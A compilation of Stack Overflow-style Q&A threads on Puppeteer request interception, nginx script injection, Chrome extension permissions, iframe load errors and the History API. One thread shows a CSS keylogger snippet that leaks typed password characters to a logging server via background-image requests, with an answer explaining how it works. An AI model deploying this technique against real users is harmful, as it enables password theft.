How to intercept a request in Puppeteer before the current page is left?

Use case:
We need to capture all outbound routes from a page. Some of them may not be implemented using link elements <a href="..."> but via JavaScript code or as GET/POST forms.
PhantomJS:
In PhantomJS we did this using the onNavigationRequested callback. We simply clicked on all the elements matched by some selector, used onNavigationRequested to capture the target URL (and, for forms, the method and POST data), and then cancelled that navigation event.
Puppeteer:
I tried request interception, but by the time a request is intercepted the current page is already lost, so I would have to navigate back.
Is there a way to capture the navigation event while the browser is still on the page that triggered it, and to stop it?
Thank you.

You can do the following.
await page.setRequestInterception(true);
page.on('request', request => {
    if (request.resourceType() === 'image')
        request.abort();
    else
        request.continue();
});
Example here:
https://github.com/GoogleChrome/puppeteer/blob/master/examples/block-images.js
Available resource types are listed here:
https://github.com/GoogleChrome/puppeteer/blob/master/docs/api.md#requestresourcetype

So I finally found a solution that doesn't require a browser extension and therefore works in headless mode.
Thanks to this comment: https://github.com/GoogleChrome/puppeteer/issues/823#issuecomment-467408640
await page.setRequestInterception(true);
// `url` is the address of the page being scanned (the one passed to page.goto)
page.on('request', req => {
    if (req.isNavigationRequest() && req.frame() === page.mainFrame() && req.url() !== url) {
        // no redirect chain means the navigation is caused by setting `location.href`
        req.respond(req.redirectChain().length
            ? { body: '' } // prevent 301/302 redirect
            : { status: 204 } // prevent navigation by js
        );
    } else {
        req.continue();
    }
});
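The question also asks to record the target URL, method and POST data, as onNavigationRequested did in PhantomJS. Below is a minimal sketch built on the same respond-based trick as the snippet above, collecting those details into an array before cancelling each navigation. `captureNavigations` is a hypothetical helper name, and it assumes the caller has already run `await page.setRequestInterception(true)`.

```javascript
// Hypothetical helper: records main-frame navigations away from startUrl and cancels them.
// Assumes request interception is already enabled on `page`
// (await page.setRequestInterception(true)).
function captureNavigations(page, startUrl) {
    const captured = [];
    page.on('request', (req) => {
        const leavesPage =
            req.isNavigationRequest() &&
            req.frame() === page.mainFrame() &&
            req.url() !== startUrl;
        if (!leavesPage) {
            req.continue();
            return;
        }
        // Record what PhantomJS's onNavigationRequested used to expose.
        captured.push({
            url: req.url(),
            method: req.method(),
            postData: req.postData(), // undefined for requests without a body
        });
        // Same trick as above: an empty body stops a followed redirect,
        // a 204 No Content response stops a JS- or form-triggered navigation.
        req.respond(req.redirectChain().length ? { body: '' } : { status: 204 });
    });
    return captured;
}
```

Typical use would be `const found = captureNavigations(page, page.url());` after `page.goto()`, followed by clicking each candidate element and reading `found`. Because a click can resolve before the request event fires, you may need to wait briefly after each click.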
EDIT: We have added a helper function to the Apify SDK that implements this: https://sdk.apify.com/docs/api/puppeteer#puppeteer.enqueueLinksByClickingElements
Here is the full source code:
https://github.com/apifytech/apify-js/blob/master/src/enqueue_links/click_elements.js
It's slightly more complicated, as it needs not only to intercept requests but also to catch newly opened windows, etc.

I ran into the same problem. Puppeteer doesn't support this feature at the moment; strictly speaking, it's the Chrome DevTools Protocol that doesn't support it. But I found another way to solve it, using a Chrome extension. Related issue: https://github.com/GoogleChrome/puppeteer/issues/823
The author of the issue shared a solution here: https://gist.github.com/GuilloOme/2bd651e5154407d2d2165278d5cd7cdb
As the documentation describes, we can use chrome.webRequest.onBeforeRequest.addListener to intercept all requests from the page and block them if needed.
Don't forget to add the following arguments to the args of the Puppeteer launch options:
--load-extension=./your_ext/ --disable-extensions-except=./your_ext/
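For the extension route, here is a minimal background-script sketch. It assumes a Manifest V2 extension that declares the "webRequest", "webRequestBlocking" and "<all_urls>" permissions; blocking webRequest listeners are not generally available to Manifest V3 extensions. `registerNavigationBlocker`, `recorded` and the "let the first load of each tab through" rule are hypothetical choices for illustration. Without some such rule, the listener would also cancel the initial page.goto().

```javascript
// background.js of a hypothetical Manifest V2 extension loaded via --load-extension.
// Lets the first top-level load of each tab through (including its redirects),
// then records and cancels every later top-level navigation.
const recorded = [];
const initialRequestByTab = new Map(); // tabId -> requestId of the first load

function registerNavigationBlocker(chromeApi) {
    chromeApi.webRequest.onBeforeRequest.addListener(
        (details) => {
            if (!initialRequestByTab.has(details.tabId)) {
                initialRequestByTab.set(details.tabId, details.requestId);
            }
            // Redirects keep the same requestId, so the initial load is not broken.
            if (initialRequestByTab.get(details.tabId) === details.requestId) {
                return { cancel: false };
            }
            recorded.push({
                url: details.url,
                method: details.method,
                // Only present for requests with a body, e.g. POST forms.
                formData: details.requestBody && details.requestBody.formData,
            });
            console.log('Blocked navigation:', details.method, details.url);
            return { cancel: true };
        },
        { urls: ['<all_urls>'], types: ['main_frame'] },
        ['blocking', 'requestBody']
    );
}

// Only register when actually running inside the extension.
if (typeof chrome !== 'undefined' && chrome.webRequest) {
    registerNavigationBlocker(chrome);
}
```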

Use page.setRequestInterception(true). The documentation has a thorough example here: https://github.com/GoogleChrome/puppeteer/blob/master/docs/api.md#pagesetrequestinterceptionvalue.
Make sure to add some filtering logic; the example (reproduced below) aborts image requests. In the same way, you would capture each request of interest and then abort it.
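await page.setRequestInterception(true);
page.on('request', interceptedRequest => {
    // url() is a method in current Puppeteer versions, not a property
    if (interceptedRequest.url().endsWith('.png') ||
        interceptedRequest.url().endsWith('.jpg'))
        interceptedRequest.abort();
    else
        interceptedRequest.continue();
});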

Related

How do you make a Keylogger with CSS?

input[type="password"][value$="a"] {
    background-image: url("http://localhost:3000/a");
}
const inp = document.querySelector("input");
inp.addEventListener("keyup", (e) => {
    inp.setAttribute('value', inp.value);
});
This is what I've found, but I don't think it works. How do I do it?
Edit: I realised that the CSS snippet won't work on its own, because typing in the input field does not change the value attribute of the HTML element. JavaScript is required for that. Hence, include the JavaScript lines of your snippet in a script tag and then it should work.
The CSS keylogger was originally a thought experiment, as explained in this LiveOverflow video. The snippet you are using assumes that http://localhost:3000/ is a malicious web server which records your HTTP requests.
In this case, entering "a" on the keyboard (in the input field) would send a request to http://localhost:3000/a (to fetch the background image), which the web server can log as the keystroke "a". You could write a Node.js or Python web server to receive these requests and recover the keystrokes.

Redirect a http request to a website from within an iframe with a Reverse Proxy in front of the site

I am using nginx as a Reverse Proxy in front of a website and intercept download/preview requests for the files stored on the site. The download requests come from within an iframe and if the user is not authorised, I redirect them to the logout page. But this does not take the main page (outside of the iframe) to the logout page. Any idea how to go about this?
If the user is not authorised, you may want to send a message from the iframe to its parent. On receiving the message, you would then redirect the parent window to the logout page. An example implementation is found here.
However, this becomes much harder if you are not able to modify the iframe page's source. Since you are using nginx, one solution would be script injection using the ngx_http_sub_module module. This module replaces one string in the response with another. Note that this module is not built by default; you may need to build nginx with the --with-http_sub_module parameter. See the module page for more information, including an example.
The iframe needs the line:
parent.postMessage( "redirect", "http://www.your-domain.com" );
To inject this with nginx you might try:
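location / {
    # Inject this only into the "not authorised" response served to the iframe: on a
    # top-level page, parent is the window itself, so it would redirect itself as well.
    sub_filter '</head>' '<script language="javascript">parent.postMessage( "redirect", "http://www.your-domain.com" );</script></head>';
    sub_filter_once on;
}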
The parent window would need the corresponding code:
var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
var eventer = window[ eventMethod ];
var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";
// Listen to message from child window
eventer( messageEvent, function( e ) {
    // Only accept messages from your own domain, so that other sites
    // cannot trigger the redirect
    if ( e.origin !== "http://www.your-domain.com" ) {
        return;
    }
    // Compare with ===; a single = would assign and always be true
    if ( e.data === "redirect" ) {
        window.location.replace( "your-logout-url" );
    }
}, false );
A more advanced solution might include the redirect url in the message; you could then handle the iframe redirecting to different locations.
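Here is a sketch of that more advanced variant. It assumes the iframe sends an object such as `{ type: "redirect", url: "/logout" }`, which is a hypothetical message format. The parent only acts on messages from the expected origin and only follows URLs on that same origin, so a third-party frame cannot send the user elsewhere. `createRedirectHandler` is a hypothetical name, and the origin is the placeholder used above.

```javascript
// Hypothetical message format sent by the iframe:
//   parent.postMessage({ type: "redirect", url: "/logout" }, "http://www.your-domain.com");
function createRedirectHandler(expectedOrigin, navigate) {
    return function (event) {
        // Ignore messages from any other origin.
        if (event.origin !== expectedOrigin) return false;
        const data = event.data;
        if (!data || data.type !== "redirect" || typeof data.url !== "string") return false;
        let target;
        try {
            // Resolve relative URLs against our own origin.
            target = new URL(data.url, expectedOrigin);
        } catch (e) {
            return false; // unparsable URL
        }
        // Refuse to send the user to another site.
        if (target.origin !== expectedOrigin) return false;
        navigate(target.href);
        return true;
    };
}

// In the parent page:
if (typeof window !== "undefined") {
    window.addEventListener(
        "message",
        createRedirectHandler("http://www.your-domain.com", (href) => window.location.replace(href))
    );
}
```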

Checking tab status in a chrome extension with a popup without the tabs permission

I'm currently trying to build my first chrome extension and I only need it to interact with pages of a few domains, so I want to avoid using the "tabs" permission since I understand it would have me request access to all information and all domains.
Instead I want to restrict myself to using the activeTab permission and, if need be, a content script.
In short, what I want to do is display a "Subscribe button" in my extension's popup if the currently selected tab's url is of the domain(s) I'm interested in.
I can get the url of the page when it's created using a content script but I don't know how to make sure the user is still on that page when my extension is clicked.
I haven't managed to get anything done with activeTab.
Thanks in advance for any advice you can give; I'll check the answers (if any) after work.
A working example with the activeTab permission:
In your popup.js
chrome.tabs.query({lastFocusedWindow: true, active: true}, function(tabs) {
    if (tabs && tabs[0] && tabs[0].url) {
        var match = tabs[0].url.match(/^[^:]+:\/\/([^\/]+)/);
        if (match) {
            var domain = match[1];
            if (domain === 'stackoverflow.com')
                alert('test');
        }
    }
});
Note:
You have to declare the "activeTab" permission in your manifest (of course).
JavaScript code must be in a standalone file and included in popup.html with <script src="..."></script>. Inline JavaScript is not allowed due to CSP.
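To show the button for several domains, you can replace the regex with the standard `URL` parser and a small allow-list check. This is a sketch under a few assumptions: a hypothetical `ALLOWED_DOMAINS` list, a `#subscribe` button in popup.html that is hidden by default, and the idea that subdomains (e.g. meta.stackoverflow.com) should also match.

```javascript
// Hypothetical allow-list; subdomains of these also match.
const ALLOWED_DOMAINS = ["stackoverflow.com", "example.org"];

function isAllowedUrl(url) {
    let hostname;
    try {
        hostname = new URL(url).hostname;
    } catch (e) {
        return false; // missing or unparsable URL (e.g. tab URL not exposed)
    }
    // The "." prefix keeps notstackoverflow.com from matching stackoverflow.com.
    return ALLOWED_DOMAINS.some(
        (domain) => hostname === domain || hostname.endsWith("." + domain)
    );
}

// popup.js: runs each time the popup opens, i.e. right after the user clicked the
// extension's toolbar button, which is when activeTab grants access to the tab's URL.
if (typeof chrome !== "undefined" && chrome.tabs) {
    chrome.tabs.query({ active: true, lastFocusedWindow: true }, (tabs) => {
        const tab = tabs && tabs[0];
        if (tab && isAllowedUrl(tab.url)) {
            document.getElementById("subscribe").hidden = false;
        }
    });
}
```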

detect iframe load error

I am loading a user-selected page into an iframe using the src property. If the load fails, I would like to report the problem in terms that will make sense to the user. iframe does not, in general, support onerror according to http://www.w3schools.com/jsref/dom_obj_frame.asp.
The page may come from the user's domain, not mine, so I cannot view the content of the iframe.
I can set a timeout and cancel it from my onload handler if the load is successful, but it would need to be a long timeout to avoid false error reports, and meanwhile Safari on my iPhone has displayed an alert that may confuse the user. Even this does not work for the Kindle Fire browser - it delivers a load event to my handler regardless of whether the load was successful.
Is there any event I can use to detect failure? Is there any way to suppress the default Safari behavior? Any way I can tell whether the load attempt has failed? (If I could do that, I could use a shorter timeout and poll until the load attempt is resolved).
I can require the use of up to date browsers, but would like a solution that is portable among as many smartphones and tablets as possible.
I have tested the AJAX Get idea, and it unfortunately does not work. A cross-domain AJAX Get to an arbitrary URI results in an exception, regardless of whether the target exists and can be loaded into the iframe or not.
You could set your iframe and/or AJAX request to always call a page you control (e.g. loader.php), passing the user's requested URL to loader.php as a GET parameter. From loader.php, use cURL or even just file_get_contents to fetch the external page. If that fetch fails, loader.php can inspect the error and return whatever you want your iframe to display.
While my example uses PHP, cURL is supported in a variety of scripting languages. It is likely more complicated than other solutions you might have, but it also gives you access to the response headers for troubleshooting why a page load failed.
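The benefit of a server-side loader is that a failed fetch comes with a machine-readable reason you can turn into a message the user understands. The sketch below uses Node.js rather than PHP, to match the other examples. `describeFetchError` is a hypothetical helper that maps some common Node.js network error codes (as found on `err.code`) and HTTP status codes to user-facing text; the wording and the selection of codes are assumptions.

```javascript
// Hypothetical helper for a loader endpoint: turns a failed fetch into user-facing text.
// `err` is a Node.js network error (or null), `statusCode` the HTTP status (or null).
function describeFetchError(err, statusCode) {
    if (err) {
        switch (err.code) {
            case "ENOTFOUND":
                return "That address could not be found. Please check the spelling.";
            case "ECONNREFUSED":
                return "The site refused the connection. It may be down.";
            case "ETIMEDOUT":
            case "ECONNRESET":
                return "The site took too long to respond or dropped the connection.";
            case "CERT_HAS_EXPIRED":
            case "DEPTH_ZERO_SELF_SIGNED_CERT":
                return "The site's security certificate is not valid.";
            default:
                return "The page could not be loaded (" + (err.code || "unknown error") + ").";
        }
    }
    if (statusCode === 404) return "The site is reachable, but that page does not exist.";
    if (statusCode === 401 || statusCode === 403) return "That page requires permission to view.";
    if (statusCode >= 500) return "The site reported an internal error.";
    if (statusCode >= 400) return "The page could not be loaded (HTTP " + statusCode + ").";
    return null; // no error: the page loaded
}
```

In a loader, you would call this from the outgoing request's `error` handler, or after checking `response.statusCode`, and send the resulting text back as the iframe's content.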
As you've hinted, you'll face same-origin-policy type restrictions when you try to query anything inside the iframe if it's on a separate domain.
You could make an AJAX GET request to the iframe's URL before you pass it into the src of the frame. If you don't get an HTTP 200 response back from the AJAX call, then the site won't be able to load inside the frame either.
This will add overhead to the whole process, and is only useful if you're checking whether the iframe's document is a real URL that works. It won't help if you need to know when the iframe document has fully loaded.
If you need to know when the iframe has loaded, and it's on an external domain, then I believe you have no other option but to ask for some code to be added to those external sites to notify the parent page that they've loaded successfully.
Or, if it makes sense to do so, ask the end user to click a link to flag up that the content isn't loading correctly.
Late to the party, but I've managed to crack it:
At first, I thought to do an AJAX call like everyone else, except that it didn't work for me initially, as I had used jQuery. It works perfectly if you use an XMLHttpRequest:
var url = "http://url_to_test.com/";
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
    // readyState 4 = request finished; a status of 0 means the request failed
    // outright or was blocked (e.g. by cross-origin rules)
    if (this.readyState == 4 && this.status != 200) {
        console.log("iframe failed to load");
    }
};
xhttp.open("GET", url, true);
xhttp.send();
Edit:
So this method works, except that it produces a lot of false failure reports (it flags many pages that would in fact display in an iframe) because of cross-origin restrictions. The way I got around this was to make a cURL/HTTP request from a server and then check the response for a) whether the website exists and b) whether the headers set X-Frame-Options.
This isn't a problem if you run your own web server, as you can make your own API call for it.
My implementation in Node.js (using Express):
const express = require('express');
const https = require('https'); // use require('http') instead for plain-HTTP sites
const app = express();
// Call using /iframetest?url=example.com - the host must be stripped of http:// or https://
app.get('/iframetest', function (req, res) {
    const host = req.query.url;
    const request = https.request({ host: host }, function (response) {
        response.resume(); // discard the body; only the headers are needed
        if (typeof response.headers['x-frame-options'] !== 'undefined') {
            res.send(false); // headers don't allow iframe
        } else {
            res.send(true); // headers don't disallow iframe
        }
    });
    request.on('error', function (e) {
        if (!res.headersSent) {
            res.send(false); // website unavailable
        }
    });
    request.end();
});
app.listen(3000); // port chosen arbitrarily
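Checking only X-Frame-Options misses sites that forbid framing through the Content-Security-Policy `frame-ancestors` directive, and it treats error pages as frameable. Below is a sketch of a stricter check on the response's status code and headers; Node.js lower-cases header names in `response.headers`. `classifyFramability` is a hypothetical helper, and it is deliberately conservative: any `frame-ancestors` value other than `*` is reported as restricted, without checking whether your own origin is listed.

```javascript
// Hypothetical helper: decides from a response's status and headers whether the page
// is likely to render in a cross-origin iframe. `headers` uses lower-case names,
// as Node.js's response.headers does.
function classifyFramability(statusCode, headers) {
    if (statusCode >= 400) {
        return { frameable: false, reason: "HTTP " + statusCode };
    }
    const xfo = headers["x-frame-options"];
    if (xfo !== undefined) {
        // DENY and SAMEORIGIN both block framing from another origin.
        return { frameable: false, reason: "X-Frame-Options: " + xfo };
    }
    const csp = headers["content-security-policy"];
    if (typeof csp === "string") {
        // Directives are separated by ';'; Node joins repeated headers with ', '.
        const directive = csp
            .split(/[;,]/)
            .map((d) => d.trim())
            .find((d) => d.toLowerCase().startsWith("frame-ancestors"));
        if (directive !== undefined) {
            const sources = directive.split(/\s+/).slice(1);
            if (!(sources.length === 1 && sources[0] === "*")) {
                return { frameable: false, reason: "CSP " + directive };
            }
        }
    }
    return { frameable: true, reason: null };
}
```

In the Express route above, `res.send(classifyFramability(response.statusCode, response.headers).frameable)` could replace the if/else.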

HTML5 History API with Standard links

So, after redesigning my site, I thought I would use the HTML5 History API, having seen a brilliant use of it here: http://diveintohtml5.ep.io/examples/history/casey.html
Problem is, the code provided doesn't work for me, (using Chrome 8).
Not entirely sure why, but it simply refreshes the page with the href value of the link after the partial content is successfully loaded.
Are there any other examples of this use of the API? I don't want History.js or anything like that, as it uses hashes/hashbangs as a fallback, and I'm trying to get rid of those.
Any ideas?
Edit: Firebug reports 'link has no value', as well as countless requests for the partially loaded content. After these, the page refreshes.
You have to intercept the link click and call pushState yourself; if you check the code on that page, you will see the event handler:
function addClicker(link) {
    link.addEventListener("click", function(e) {
        if (swapPhoto(link.href)) {
            history.pushState(null, null, link.href);
            e.preventDefault();
        }
    }, true);
}
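A more general version of that handler, for ordinary links across a whole page, usually also checks that the click is a plain left click on a same-origin link before calling `preventDefault()`. It also listens for `popstate`, so the Back button reloads the right content. The sketch below assumes a hypothetical `loadContent(url)` that starts loading and swapping in the partial content and returns `true` if it can handle that URL, playing the role of `swapPhoto` in the example.

```javascript
// Decide whether a click on a link should be handled with pushState instead of a full load.
function shouldIntercept(event, link, currentOrigin) {
    return (
        event.button === 0 &&                        // left button only
        !event.metaKey && !event.ctrlKey &&          // keep "open in new tab" working
        !event.shiftKey && !event.altKey &&
        !link.target &&                              // ignore target="_blank" etc.
        new URL(link.href).origin === currentOrigin  // same-origin links only
    );
}

// Hypothetical: starts fetching the partial content for `url` and swapping it in;
// returns true if it handles the URL. This stub returns false, so links behave normally.
function loadContent(url) {
    return false;
}

if (typeof document !== "undefined") {
    document.addEventListener("click", (e) => {
        const link = e.target.closest("a[href]");
        if (!link || !shouldIntercept(e, link, location.origin)) return;
        if (loadContent(link.href)) {
            e.preventDefault();
            history.pushState(null, "", link.href);
        }
    });
    // Back/Forward: load the content for the URL we are returning to.
    window.addEventListener("popstate", () => {
        loadContent(location.href);
    });
}
```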